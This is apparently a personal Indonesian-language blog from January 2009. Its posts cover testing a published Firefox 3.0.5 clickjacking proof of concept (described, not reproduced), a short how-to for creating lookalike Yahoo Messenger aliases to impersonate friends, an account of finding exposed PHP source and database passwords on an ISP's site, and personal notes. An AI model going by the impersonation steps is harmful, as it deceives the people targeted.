2009-01-23 15:00:25 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:01:02 10.11.12.66 10.11.21.200 > POST 10.11.21 .200 /index.php HTTP/1.1 - -
2009-01-23 15:01:02 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:01:06 10.11.12.66 10.11.21.200 > POST 10.11.21 .200 /index.php HTTP/1.1 - -
2009-01-23 15:01:06 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:01:06 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:01:07 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:01:16 10.11.12.66 10.11.21.200 > POST 10.11.21 .200 /index.php HTTP/1.1 - -
2009-01-23 15:01:32 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:28:42 10.11.21.200 10.11.15.171 > GET yum.telkom.net.id /rhe5-i386/epel/repodata/repomd.xml HTTP/1.1 - -
2009-01-23 15:28:42 10.11.15.171 10.11.21.200 < - - - HTTP/1.1 200 OK

analisa terus ....

akhir2x ini lagi asyik nih baca paketstormsecurity , situs audit yang sudah lama ditinggalkan .... akhirnya dibaca kembali ....

Firefox Clickjacking 3.05

Pagi ini iseng nih ke situs http://www.packetstormsecurity.com/ , saya menemukan bacaan yang menarik dan kebetulan saya memakai aplikasi itu

http://www.packetstormsecurity.com/0901-exploits/firefox-clickjack.txt


Firefox 3.0.5 Status Bar Obfuscation / Clickjacking


saya save kedalam hijack.html

saya buka melalui browser mozilla 3.05



sekilas mengarah ke google

ternyata

load javascript .... ke milw0rm


tha thaaaaaaaaaa ....

mengarah ke milw0rm ...

test mendisable java script ...



mengarah ke google sebenarnya

nah betapa berbahayanya clickjaking ini apalagi digunakan untuk phising ...

- hore senin libur .............

Thursday, January 22, 2009

hacking heart by yahoo messenger - social engineering

Ada cerita lucu kira2x 9 bulan lalu , ketika pindah bagian di new place ... urus system ... sama developmentnya , .. otomatis ya perkenalan dengan teman-teman yang baru ... add Yahoo messenger donk ... , tiap aku kasih pastinya id ku yang asli ke temen-temen baru ini, tapi di ym ku sendiri aku create 5 id yang digunakan sebagai social engineer ( fake id ) , caranya cukup mudah kok


1. yahoo messenger - messenger - my account info - masukkan password ( verify )
2. Edit/Create Aliases - add new alias - ok lalu logout ym kamu
3. login kembali - lalu pilih korban kamu




nah kamu bisa social engineer - caranya kamu pakai nick yang hampir mirip2x sama temanmu deh ... trus pura2x tanya .. sampai sampai

pelaku nick palsu : kerjain kita makan yuuk sekarang
korban : tumben kamu ngajak begitu ?
pelaku nick palsu : yah aku tunggu diluar ruangan ya , kan aku kangen sama kamu ...
korban : beneran ?
pelaku nick palsu : iya lah masa bohong
korban : ok

korban , lalu berjalan keluar celingak celinguk menunggu temennya ( orang asli )

korban , menunggu sepuluh menit lalu , menghampiri si orang asli berkata

korban : jadi makan gak ?
orang asli : sapa yang ajak kamu ?
korban : lho barusan di yahoo messenger
orang asli : ih gr banget ...
korban : "muka nya merah " <---- ternyata ada hati ....

dari gambaran diatas terlihat mudah bukan ... social engineering yang dilakukan pelaku .. bahkan masih banyak ribuan social engineering yang dilakukan ...

maaf tujuan disini cuma ujicoba aja yaa ... jangan diikutin lho

hmm .... let me find new place and work again ....... help me god //\\

Wednesday, January 21, 2009

friendster vs facebook

isengiseng membandingkan 2 situs komunitas terbesar di dunia ....



kenaikan pengunjung facebook cukup menggila , dibandingkan dengan friendster yang tidak beranjak ... , apakah ini runtuhnya kejayaan friendster ? .... jika friendster mau merubah systemnya mungkin bisa ... dengan improvment yang baru .....

nb :
failed lagi nih , cari lagi deh ..... masih jalan2x ditempat ... tetap semangat !!! , selama jalan masih ada selama masih berputar dan selama masih harapan terbentang luas ....

Sunday, January 18, 2009

Wordpress yang aneh di hosting yang free

jurnal :

Kali ini install wordpress di web freeweb7.com parah , create database ok begitu mau connect gak connect2x idle nih web :D , selang 1 menit baru deh sambung lagi ... tapi walhasil jadi juga ... selama bumi berputar pada porosnya ..

hari ini belajar berbagi nih ... transfer knowledge kepada orang yang nun jauh di sana ... aku memperkenalkan wordpress ini kepada orang itu ...

hari ini ...

sabtu - minggu ...

sabtu : bangun jam 11 siang
cukur rambut jam 2
ke warnet check server dulu jam 3-7
internet + install jam 10-3 pagi

minggu nya : tidur ....

Monday, January 12, 2009

View Source code = Vsc

Sebenernya saya ingin share betapa rentannya bug yang saya temukan di salah satu situs isp terbesar di indonesia , menyediakan layanan berbasis 3G ini , penelusuran saya berawal saya iseng seperti apa sih source code nya ....

ternyata disana terdapat file 2x dalam bentuk php ... , hingga akhirnya saya pelajari file2x tersebut bahkan melihat semua file di php , yah simple tapi menyakitkan ,
sampai saya menelusuri file connect api dari oracle , enak juga ternyata membaca source code php nya , padahal saya paling malas membaca php programming ini , saya lebih menyukasi server berbasis aplikasi ... dalam bentuk tar.gz

kalau saja saya install toad saya bisa obok2x databasenya itu juga kalau tidak kenal firewall langsung , semua password , host server saya lihat , bahkan saya mempelajari load balancernya ke arah oracle itu.

saya sudah mereport hal tersebut , tapi sepertinya belum ada balasan ...

ya sudahlah metode manual ini ternyata indah ///

nb : akhirnya laptop dibenerin juga nih , emang dunia hampa banget kalo gak ada komputer ya ... duh pengen cari tantangan di t4 lain nih ... kalo bisa hati sih pengen jadi NE , paniknya yang bikin asyik sih kalo gangguan :D

Thursday, January 08, 2009

Happy New York !!!

Kata kata itu terlontar dari seorang mulut temen saya , yah mungkin karena dia terbilang lucu , sampai dia berkata duh kok dapet sms kayak begini happy new york yah memang dia cuma lulusan sma yang tidak mengerti sama sekali bahasa inggris ... " sampai dia bilang gimana mau ngomong inggris tiap hari cuma makan tempe orek ", padahal happy new year , aku ngakak setengah mati ...

HAPPY NEW YEAR 2009

Mohon maaf kalau ada salah ucapan , kritikan , mungkin disini sifatnya sebagai pembelajaran dan tidak bermaksud menyudutkan kebodohan , keidiotan dan kegilaan manusia.

yang pasti saya akan terus membuat tulisan yang bermanfaat untuk kemajuan IT di indonesia.

regards

iqbal